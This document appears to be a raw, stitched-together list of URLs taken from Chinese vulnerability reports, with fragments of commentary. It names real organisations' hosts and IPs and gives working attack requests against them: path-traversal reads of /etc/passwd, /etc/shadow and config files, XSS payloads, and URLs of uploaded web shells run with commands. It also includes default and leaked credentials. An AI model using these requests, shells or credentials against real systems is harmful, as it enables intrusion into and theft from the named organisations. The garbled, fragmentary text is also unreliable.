http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml www.gongren8.com https://github.com/search?q=gongren8.com&ref=searchresults&type=Code&utf8=%E2%9C%93 https://github.com/testerHobbit/TestPY/blob/6406eae20e3952f9046d944fbce212230a384244/testMysql/testmysql.py http://www.zousifun.com/admin/cms/info_xpage.do http://222.77.179.253:8090 http://login.jzjt.com/jznw/zwMore.jsp?comp=11 http://login.jzjt.com/contents/oaBBS/13.jsp?id=153 http://218.65.95.151:8088/ http://219.139.240.32:8080/ http://call.fezo.com.cn/login ftp://222.73.44.98/ ftp://222.73.44.98/IT2.10%20201505/Web.config http://www.hebzx.gov.cn/web.rar http://oa.sxky.cn/defaultroot/login.jsp http://oa.sxky.cn/console/ http://oa.sxky.cn/ceshi/ http://www.coremail.cn/的用户列表,恰好有个朋友她们用的就是该邮件系统的邮箱,故让其帮忙申请了个内部邮箱,一番测试果然该处存在xss漏洞,触发简单,容易中招。 http://www.weimeigu.com/flash/getflash.php?id=127 http://isv.suningcloud.com land.minmetals.com.cn/upload/attachment/ hnc2626.minmetals.com.cn/upload/attachment/ torchcn.minmetals.com.cn/upload/attachment/ resources.minmetals.com.cn/upload/attachment/ http://union.winenice.com http://119.188.7.130:7001/fybj/index.admin.jsp http://119.188.7.130:7001/fybj/ http://119.188.7.130:7001/sdggws http://119.188.7.130:7001/console/login/LoginForm.jsp http://www.ahwst.gov.cn:8080/defaultroot/login.jsp http://www.ahwst.gov.cn:8080/console http://www.ahwst.gov.cn:8080/ceshi/ http://mail.lookango.com/的人估计应该是处女座的,不然咋设置的邮箱密码咋那么有规律? http://pm.ncmcc.com.cn/hykg/ http://www.teachina.com/up/ http://www.teachina.com/up/20131109210255.asp(密码:8888) http://www.teachina.com/up/20120503164837.aspx http://www.cofco-health.com/ http://www.tuhsu.com.cn/ http://www.teachina.com/ http://chinatea.com.cn/ http://www.cofco-health.com/ http://www.ccsa.org.cn/showgn.php3?source=yd&id=4550 com:27017 http://202.108.103.137/admin/ http://fw.fs110.gov.cn/shownews.aspstyle=zagl&id=76 www.capub.cn http://lvyou.jyyuan.com/Hotel/Hotel_Room.php?HId=11 http://123.126.136.35/newsedit/batman/Login.jsp http://223.223.197.242:13988/ http://www.beidoudb.com:88/ http://www.beidoudb.com:88/document/uploads/ http://www.beidoudb.com:88/document/uploads/a182e558-521c-4609-ba94-e621d6bf8bf5.txt http://www.beidoudb.com:88/BackStage/User/Useradd.php http://www.beidoudb.com:88/BackStage/User/Userlist.php www.castcc.com http://ysh.cpicorp.com.cn/news.asp?id=2560 http://ysh.cpicorp.com.cn/news.asp http://sqlmap.org http://www.suningcloud.com/ www.suningcloud.com http://www.suningcloud.com http://account.tcl.com/tclcustomerfindpwd/toFindPwdStep1?ReturnUrl=http://mall.tcl.com/&resource=shoptcl http://wooyun.org/searchbug.php?q=5LiH6L6%2B&pNO=2 http://gcms.admin.cnsuning.com/queryLargePuchase.action http://gcms.admin.cnsuning.com/queryLargePuchase.action http://www.yiqifa.com:80/searchCampaignBeginList.do?auditingType=-1 www.pg.com.cn http://apis.map.qq.com/uri/1/geocoder?latlng=23.137287,113.373192&referer=pcqq http://m.jinjianginns.com//order/list?guestId=*&tel=&channel=HOTELVP_JJZX_WAP http://m.jinjianginns.com/order/list?guestId=50181503&tel=&channel=HOTELVP_JJZX_WAP http://m.jinjianginns.com/order/list?guestId=50181899&tel=&channel=HOTELVP_JJZX_WAP http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000045448&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://wx.aeonlife.com.cn/baodan/BXHTCX.do http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000045448&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000051348&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://wx.aeonlife.com.cn/baodan/BXHTCX.do?customerNo=&contno=1130101000051338&openId=oCrFruEGq1f4zAu72MA4le2v_X0M http://www.etaoshi.com/canting/Map/HomeMap?s=cqjgbmfd http://www.cool170.com https://trade.gfund.com/etrading/ https://trade.gfund.com/is2/cmd.jsp http://bbs.utouu.com/uc_server/admin.php http://mail.zto.cn/index.php http://chat9.jd.com/ http://www.cfwhw.gov.cn/sysadmin/login.jsp http://www.polycinemas.com/website/register.jsp?current=vip_index http://www.polycinemas.com/website/reset_password.jsp?username=wooyun123 http://wooyun.org/bugs/wooyun-2015-0126685 http://www.anxin.com/usercenter/userinfo/Default.html http://www.anxin.com/usercenter/userinfo/default.html?p=getback http://www.anxin.com/usercenter/money/bankcard.html?a=show http://www.ccsa.org.cn/worknews/content.php3?id=3121 http://sqlmap.org http://sp1.baidu.com.cn/dan.php?c=IZ0-5HDYnW0snWRzPWT0IgF_5y9YIZ0lQzqYQhP8QdFnTy9kiYY0 http://pk.match.ali213.net/login?id=1 http://pk.match.ali213.net http://www.begcl.com/ http://www.begcl.com/rbac/ http://119.254.24.11/userLogin http://campus.tcl.com/Portal/Account/Login这个是TCL集团校招网申系统登陆接口,发现没有验证码 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000008728 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320301000007128 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007128 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007228 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007328 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007428 http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000007528 http://www.yileyoo.com/ey_game_update/adjustGame.html?gamename= http://61.132.136.226/views/show/33336.htm www.fjcyl.com http://ty1.fjcyl.com:10000/login.jsp http://www.ahty.gov.cn/xwzx-xwfb/article.jsp?articleId=31525 http://pan.pingan.com/login www.yishion.com.cn/spread.php?timeforspread=1 http://vip.yishion.com/backEnd/login.php http://**.**.**.**/search/index/portalId/1?portal_model_code=&keyword=x&s=%CB%D1%CB%F7 http://**.**.**.**/search/index/portalId/409?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/402?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/403?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/402?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/662?portal_model_code=&keyword=x&s=%CB%D1+%CB%F7 http://**.**.**.**/search/index/portalId/407?portal_model_code=&keyword=x&s=%CB%D1%CB%F7 http://**.**.**.**/search/index/portalId/644?portal_model_code=&keyword=x&s=%CB%D1%CB%F7 www.he-pai.cn http://www.he-pai.cn http://218.65.95.152:8081/jzRole/Login.action http://218.65.95.152:8081/jzRole/nandi.jsp http://tbisp.tba.gov.cn/ https://61.178.118.80/ http://**.**.**.**:8080/servlet/keywordEditServlet?kid=184 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=3 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1425 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1254 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=2 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=4 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=2 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=33 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/kbsearch?state=0 http://**.**.**.**:8080/servlet/delquestion?qid=2 http://**.**.**.**:8080/servlet/delquestion?qid=4 http://**.**.**.**:8080/servlet/delquestion?qid=150 http://**.**.**.**:8080/servlet/delquestion?qid=2 http://**.**.**.**:8080/servlet/delquestion?qid=1 http://**.**.**.**:8080/servlet/delquestion?qid=2 http://**.**.**.**:8080/servlet/delquestion?qid=1 http://**.**.**.**:8080/servlet/delquestion?qid=47 http://**.**.**.**:8080/servlet/delquestion?qid=1 http://cecms.yixin.com http://torder.ufida.com.cn/UFSIMS/Partner/PartnerUserUP.aspx?kehubianma=KHBBJXYD20141112105221 http://torder.ufida.com.cn/UFSIMS/admin/adminUserSpecialSP.aspx?oFlag=Sel&pk=6480_5712_2704_5808_11020_5200_5768_5814_5616_10165_6000_5304_2964_6534_11020_5300_5768_4896_5824_10165_6360_5814_2548_6534 http://torder.ufida.com.cn/ufsims/partner/partneruserchancemx.aspx?flag=sel&baobeibianma=sjbbjxyd20140217081419 http://torder.ufida.com.cn/UFSIMS/Partner/PartnerUserDiscountUP.aspx?oFlag=Modify&seq=6480_5304_2912_5808_11020_5300_5150_4896_5200_10165_6000_5508_2496_5808_11020_5400_5150_5814_5200_10165_6480_5508_2548_6050 http://torder.ufida.com.cn/UFSIMS/admin/adminUserSpecialSP.aspx?oFlag=Sel&pk=6360_5712_2912_5808_11020_5200_5768_5814_5616_10165_6000_5304_2964_6534_11020_5400_4944_5406_4992_10165_6480_4998_2704_6776_11020_5200_5768_4896_4992 http://www.pcschool.com.tw/activity/phone/Yahoo_Tcode.asp?pno= http://www.jinerdai.com/articlelist.page?type_id=05 http://menpiao.suning.com/trip-web/order/orderFillIn.htm?realSenId=SN152381&realProductId=SN111013866&realBranchId=1013866&realSalePrice=125(带入的金额)&realMarketPrice=170&realNum=1&realDate=2015-07-17 http://60.255.41.58 http://inside.baidu.com/sql/.svn/entries http://1.202.208.18:8080/login.html http://61.191.199.41/ http://61.191.199.41/Manage/default.php http://61.191.199.41/Manage/downloads.php?FileName=../configs.inc.php upload:http://61.191.199.41/tzl/upload.php http://www.ucaiyuan.com/forgetpwd http://www.lepao.com ftp://sxscredit.gov.cn http://www.hljzx.gov.cn:80/ www.hljzx.gov.cn http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://**.**.**.**/Tools/stream/FlvStream.ashx?file=./web.config http://cmdp.ncc.cma.gov.cn/drought/frost/area.php?filterType=nation&id=1 http://www.hebaodai.com/ http://ims.zj31.net/pm/ www.23ye4.com/com_news_show.asp?showid=556。找到VPN的地址、用户名规则、默认密码。最重要的是大体了解了配置方式。 www.docin.com/p-575094174.html http://ec1.crcc.cn:80/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&dwbm=00100000370&sbwzly=0&xh=1 http://ec1.crcc.cn:80/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&dwbm=00100000370&sbwzly=0&xh=1 http://59.151.126.67:7001/console用weblogic/weblogic成功登录之后,deploy大马也顺利。 http://www.dlrcb.cn:80/newswebui/newsearchmapframe.aspx?searchtext= http://zfgjj.hanzhong.gov.cn/ http://zfgjj.hanzhong.gov.cn/login.jsp http://zfgjj.hanzhong.gov.cn/upload/download/1436977974459yjh.jsp http://adorders.huiyan.baofeng.com/ focus.stock.hexun.com/struts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd https://lejifen.taccb.com.cn/jfyMall/ https://jf.pzhccb.com/jfyMall/ https://jf.jn-bank.com/jfyMall/ https://jf.qsbank.cc/jfyMall/ https://jf.dyccb.net/jfyMall/ https://jf.pznsh.com/jfyMall/ https://lejifen.taccb.com.cn/jfyMall/ TM:114274342 PWD:gdcrm@123 http://www.hwjyw.com/about-us.html http://123.125.120.88/hwjyw/search.jsp http://123.125.120.88/cK/foot.jsp http://124.127.187.241/ http://wd.suning.com/ http://jwvideo.tyust.edu.cn/opencourse.aspx?cid=1 http://www.jzjt.com/ http://www.jzjt.com/wp-content/plugins/w3-total-cache/wooyun.php http://218.65.95.176/webfw/sys/login.action http://218.65.95.162/ysbx/main.do http://chuyuan.jzjt.com/admin/ http://218.65.95.152:8088/GetLoginInfo.asmx http://tempuri.org/GetTelNumberByIMSI soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://www.haodai.com/ajax/getpasswd http://www.anjucn.net/documents.jsp?alias=%E5%AE%89%E5%B1%85%E7%99%BE%E7%A7%91 http://15th.300.cn/ce_15th/story/10?search_company=&search_name= http://124.207.179.212/netrep/index.jsp http://mail2.glsc.com.cn:8084/names.nsf?Login http://mail2.glsc.com.cn:8093/stcenter.nsf?OpenDatabase http://oa.glsc.com.cn http://campus.coolpad.com/index.php?c=schoolRecruitment&f=jobPosition&cate=all&id=dg== http://www.pznews.com inurl:/opac_two/search2 http://**.**.**.**/opac_two/postinformation/list_holdretrieve.jsp?kind=query http://**.**.**.**/opac_two/postinformation/list_recall.jsp?kind=query http://110.249.165.66:8012/wtk/czznfw.action?problemid=0&xlsysid=171 http://wap.sogou.com/web/searchList.jsp?uID=4uuU0hrg8f0RIL-c&v=5&w=1278&t=1437010229530&s_t=1437010266422&keyword=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&pg=webSearchList http://www.teachina.com/ http://www.teachina.com/map.aspx http://www.newv.com.cn/case_enterprise.html http://www.newv.com.cn/case_college.html http://www.newv.com.cn/case_government.html http://volvo.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://chrysler.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://118.122.88.90:65000//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://exam.ecustmde.com/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://exam.qdgw.edu.cn/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://exp.chinaopenschool.com/kl/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://rlk.chinaopenschool.com/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://61.186.173.202:8088//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://222.195.242.203//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://wk185.wangkao.sczsxx.org//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://www.chinaopenschool.com/gsedu_admin//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://219.144.128.183:9999/cloud//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://180.166.112.32//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://211.155.225.155//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://211.147.233.3//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://cpe.hongjingedu.com//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://edu-f.gcl-power.com//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://elearning.dahuatech.com:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://live.lifan.net//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://60.190.166.50:89//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://www.dlzhifeng.com:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://elearning.900950.com//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://218.61.202.30:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://60.191.246.18:8888//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://dskc.nenu.edu.cn/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://seller.cctvmall.com/cshop/manage/login http://**.**.**.**/bugs/wooyun-2010-062061 http://**.**.**.**/fsweb/ http://**.**.**.**/gdlibweb/ http://www.cica.nkfust.edu.tw/Persontech!init.action http://42.96.197.177/Frontpage/usermanage/Personal_Login.jsp http://cart.suning.com/emall/GiftCardDisplayView?storeId=10052&catalogId=10051&100=0&500=0&1000=0&other=1&otherPrice=200&amount=200 http://1.189.209.195:8080/index.jsp http://csbh.com.cn/share/download.jsp?filePath=../../../../../../../etc/shadow&fileName=shadow http://csbh.com.cn/share/download.jsp?filePath=../../../../../../../etc/passwd&fileName=passwd http://photo.sac.net.cn/sacmp/ http://login.jzjt.com/login.jsp http://chuyuan.jzjt.com/admin/ http://114.251.251.100:7001/ http://114.251.251.100:7001/console/ http://114.251.251.100:7001/job/test1.jsp http://www.zijinsuo.com/register.do?action=passWord http://**.**.**.** http://**.**.**.**/goa/Jhsoft.Web.login/NewList.aspx?ID=60 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewList.aspx?ID=12 http://**.**.**.**:8080/c6/Jhsoft.Web.login/NewList.aspx?ID=12 http://**.**.**.**:8090/c6/Jhsoft.Web.login/NewList.aspx?ID=12 http://**.**.**.**:7001/netrep/index.jsp http://**.**.**.**:7010/netrep/index.jsp http://wooyun.org/bugs/wooyun-2010-083087 http://admin.zndns.com/userAction!login.do http://www.gsbankchina.com/主站,IP:118.180.7.25 URL:http://118.180.7.29/login.action http://www.gdegp.com/tzzcList.aspx?NoticeTypeEnum=1 http://122.225.108.2:8080/accounts/login/ http://www.jinliangbao.com/PasswordManage/forgetLogPassword http://61.178.14.114:8080/console/login.xhtm http://www.caals.org.cn/ http://www.caals.org.cn/2011.php http://118.145.6.103 http://sales.phfund.com.cn/console http://sales.phfund.com.cn/jmxroot/jmxroot.jsp http://www.4001017017.net/order/header/get?headerId=85000000100001 http://www.4001017017.net/order/header/get?headerId=85000000250001 http://eps.tatfook.com:8001/custom/groupnewslist.aspx?child=true&companyid=1&GroupId=38 http://eps.tatfook.com:8001/BackOffice/ http://mygo.chengdu.cn/index.php?controller=site&action=index https://www.ddxlong.com/FindLoginPwd http://wooyun.org/bugs/wooyun-2015-0126506 http://ec.mcc.com.cn:8000/logonAction.do http://ec.mcc.com.cn:8000/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://www.chebao168.com http://10.5.0.244 http://10.5.0.245 http://10.5.0.246 http://106.120.238.201/servlet/com.zotn.screens.security.LogoutServlet https://vpn.capitalwater.cn让你去登录 http://106.120.238.201/img/logo.gif http://www.smxlz.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin http://ts.21cn.com/ http://www.cr11-3.com/admin/login.php soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body ns1:requestWSResponse xmlns:ns1="http://internal.server.usky.com/ ns1:requestWSResponse soap:Body soap:Envelope https://github.com/gdby/doc/ https://www.jinpiaotong.com/ChangePassword.html?token=XXXXXXXXXXXX http://www.jiawei.com/uploadfiles/files/jianli/ http://www.jiawei.com/sysadmin/ http://www.jiawei.com/config/ http://www.jiawei.com/obj/Debug/KingTop.WEB.csproj.FileListAbsolute.txt http://www.jiawei.com/cn/Service/newsdetail.aspx?NodeCode=101034001008&ID=100000078615629&Orders=786 http://www.jiawei.com/cn/Service/newsdetail.aspx?NodeCode=101034001008&ID=100000078615629 http://www.jiawei.com/cn/Service/newsdetail.aspx?NodeCode=101034001008&ID=100000078615629 www.suningcloud.com http://www.suningcloud.com/detail/123.htm http://www.suningcloud.com/detail/123.htm https://www.cclc.co/member/reset http://219.143.162.218/ http://111.205.18.32/,为了证明2个系统不一样,我传了一个文件证明一下 http://111.205.18.32/cK/cmd.jsp http://111.205.18.32/htwx/indexlis.jsp http://111.205.18.32/cK/foot.jsp http://blog.itpub.net/message/private/op/post/ http://gj.tempus.cn/default.asp http://**.**.**.**/ http://zm.enshi.gov.cn/txt.php?bmid=9 www.anxin.com)是君安信(北京)科技有限公司的独立品牌。安心贷成立于2011年,是中国较早开始运营的P2P网贷平台。 http://120.203.214.96/xsgj/loginjzzy.jsp http:www.domob.cn https://github.com/sapocaly/domob-offerwall_daily_report/blob/f05142ada09eb73c88b51b4b589517a1503ed21e/lib/mailsend.py http://ddd.sdo.com:8012/etc/passwd http://dds.sdo.com:8011/etc/passwd http://dds.sdo.com:8012/etc/passwd http://admin.dds.sdo.com:8011/etc/passwd http://admin.dds.sdo.com:8012/etc/passwd http://223.202.24.5:8012/etc/passwd http://d.feiren.com/gj/Cococ.apk http://bj.feiren.com/ http://hy.feeyo.com/flight ps:ICCode要与请求内容一致,如果app不跳转,需要多试几次 http://218.65.95.162/jzjtoa/index.jsp http://cms.300.cn/ http://www.tcl.com/attached/help.php http://219.143.245.149:7001/console/ http://219.143.245.149:7001/vm http://219.143.245.149:7001/webtrade http://219.143.245.149:7001/vm/jmxroot.jsp https://219.143.245.152/ jdbc:oracle:thin:@172.21.102.21:1521:testdb jdbc:oracle:thin:@172.21.102.21:1521:testdb http://www.shehr.cn/office/faq2.php?id=注入 http://oa.tempus.cn/ yingyang.supfree.net/wochuo.asp?id=180/code http://bj.cd.haowangpu.com/index.php?a=nlist&m=news&catid=25 http://el.cninsure.net/Sumtotal/login.htm http://**.**.**.**/ http://wd.suning.com/的头像的上传处,可任意传asp/aspx/php/jsp/jspx/html/txt/等格式。但上传后发现文件被上传http://wd.suning.cn这个.cn的域名里!需要多助于观察! http://wd.suning.cn/weidian/2278/84/891a639aac3443cd89a4c058bab3a07b.asp?version=1437050309436 http://222.66.196.220:8080/etrading/page/frame/frame.htm http://online.suning.com http://www.yeefx.cn/demo.show.php www.ruiwen.com/index_style2.php?style2=3 http://zzcx.eol.cn/search.php?action=speciality&name=9&jiudu=6 http://www.adr.gov.cn/PF/cdr/regBase/EditBaseReg.jsp?RegisId=011013924375729270193551100000 http://mail.wfq.gov.cn/webmail/login.php?Cmd=login http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login http://mail.qtc.org.cn/webmail/login.php?Cmd=login http://mail.yphb.com.cn/webmail/login.php?Cmd=login http://mail.power-ring.cn/webmail/login.php?Cmd=login http://a.com/a.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://icounter.sinosig.com/ http://www.erke.com/newsdetail.aspx?CateID=47&NewsID=201 http://www.babycarefund.org/ http://ku.cetools.cn/yl.asp?id=1 http://ku.cetools.cn/anlidetail.asp?id=1&zan=1 http://ku.cetools.cn/anlidetail.asp?id=1 http://www.4000979797.com/yhkonline/index.jsp?lang=zh_CN http://e.4000979797.com/Order/OrderQuery gh.cmge.com/guild/list/id/116?searchkey=1 http://222.73.4.201/),即淘市网支付网关 http://222.73.4.201/console http://222.73.4.201/is/index.jsp http://222.73.4.201/is/cmd.jsp?pwd=023&cmd=arp%20-a http://seller.taoshi.com/buyer/profiles/modifypic.aspx?operation=pic http://seller.taoshi.com http://ku.cetools.cn/searchal.asp post:keyword=2014&taocan=&zj=&hy=&lx=&quyu= ftp://58.247.75.166 ftp://www.360hitao.net/ ftp://58.247.75.166/360hitaoMember/Web.config http://58.247.75.166/login/a.aspx http://www.360hitao.com/test.txt http://112.80.230.94:8002 http://112.80.230.94:8002/session_list http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019&n=%E6%A0%BC%E6%9E%97%E8%B1%AA%E6%B3%B0%E4%B8%8A%E6%B5%B7%E9%95%BF%E9%98%B3%E8%B7%AF%E6%B1%9F%E6%B5%A6%E5%85%AC%E5%9B%AD%E5%9C%B0%E9%93%81%E7%AB%99%E5%95%86%E5%8A%A1%E9%85%92%E5%BA%97 http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019一样 http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=0210 http://sklooe.cnooc.com.cn/login.aspx管理员登陆地址,点击忘记密码: http://wyzx.ustc.edu.cn/admin/Login.asp http://www.chemchinapatent.com/adminlogin.aspx http://www.ncmedia.com.cn/index.php/Product/detail_d/id/67 http://**.**.**.**/vj/Website/WebNotice.aspx?id=23 http://**.**.**.**/vj/Website/WebNotice.aspx?id=23 http://**.**.**.**/Website/WebNotice.aspx?id=404 http://**.**.**.**:8090/vj/Website/WebNotice.aspx?id=404 http://**.**.**.**/Website/WebNotice.aspx?id=404 http://**.**.**.**/vj/Website/WebNotice.aspx?id=404 http://**.**.**.**/Website/WebNotice.aspx?id=404 http://**.**.**.**/vj/Website/EnpJob.aspx?id=62 http://**.**.**.**/Website/EnpJob.aspx?id=62 http://**.**.**.**:8090/vj/Website/EnpJob.aspx?id=62 http://**.**.**.**/Website/EnpJob.aspx?id=62 http://**.**.**.**/vj/Website/EnpJob.aspx?id=62 http://**.**.**.**/Website/EnpJob.aspx?id=62 http://www.dgjy.com.cn/news_list.asp?LM=49 http://c.ahedu.net/pages/common/Login.aspx http://www.shengcaijinrong.com/Accountbase/username http://101.227.68.206/Home/logIn?ReturnUrl=%2F http://mis.998.com:5655/Home/Logon http://mis.998.com/GreenTreeInn/Login.aspx http://101.227.68.208/Login.aspx http://erp.998.com http://101.227.68.206/Home/logIn?ReturnUrl=%2F http://101.227.68.206/Complaint/RectificationEdit/c9c786f2-60c9-4cf8-8359-335e7e4cdcc4(需登录) http://fix.zealer.com/rephone/serviceDetail?id=122 http://app.sinosig.com/cpmap/DownApk?path=/../../../../../../../../../etc/passwd http://www.hi-card.cn/main.do?cat=s&k= http://www.hicard.cn/main.do?cat=s&subId=421&c=%B8%D3%CF%D8 http://hr.cmge.com/search/xz/id/1919.html http://hr.cmge.com:80/search/sz/type/%E5%AE%A2%E6%9C%8D%E7%B1%BB% http://hr.cmge.com/search/xz/city/%E6%88%90%E9%83%BD http://www.jxict.cn/ http://**.**.**.**/vj/admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**/vj//admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**//admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**:8090/vj///admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**//admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**:8090/vj/admin/ShortMessage/Iframe_Emp.aspx?tid=AC http://**.**.**.**//admin/ShortMessage/Iframe_Emp.aspx?tid=AC http://**.**.**.**//admin/ShortMessage/Iframe_Emp.aspx?tid=1 http://**.**.**.**/vj//admin/ShortMessage/Iframe_Emp.aspx?tid=AC http://**.**.**.**///admin/ShortMessage/Iframe_Emp.aspx?tid=1 http://**.**.**.**/admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**/vj/admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**/vj//admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**///admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**:8090/vj/admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://bankdata.jnlc.com/SitePages/productinfo.aspx?iFinancID=267427 http://app.ssia.org.cn/ http://web2.cdvcloud.com/e/extend/live/?i=1&id=1 http://jpay.ztems.com/,中兴九歌支付系统: http://www.dghui.com/register.action http://cc.cqbaidu.com/WEB/CallInServer/CallInCustomer.aspx http://qpn.jinan.gov.cn/login.php http://smtj.jinanbusiness.gov.cn http://pl.api.ledongli.cn/xq/io.ashx 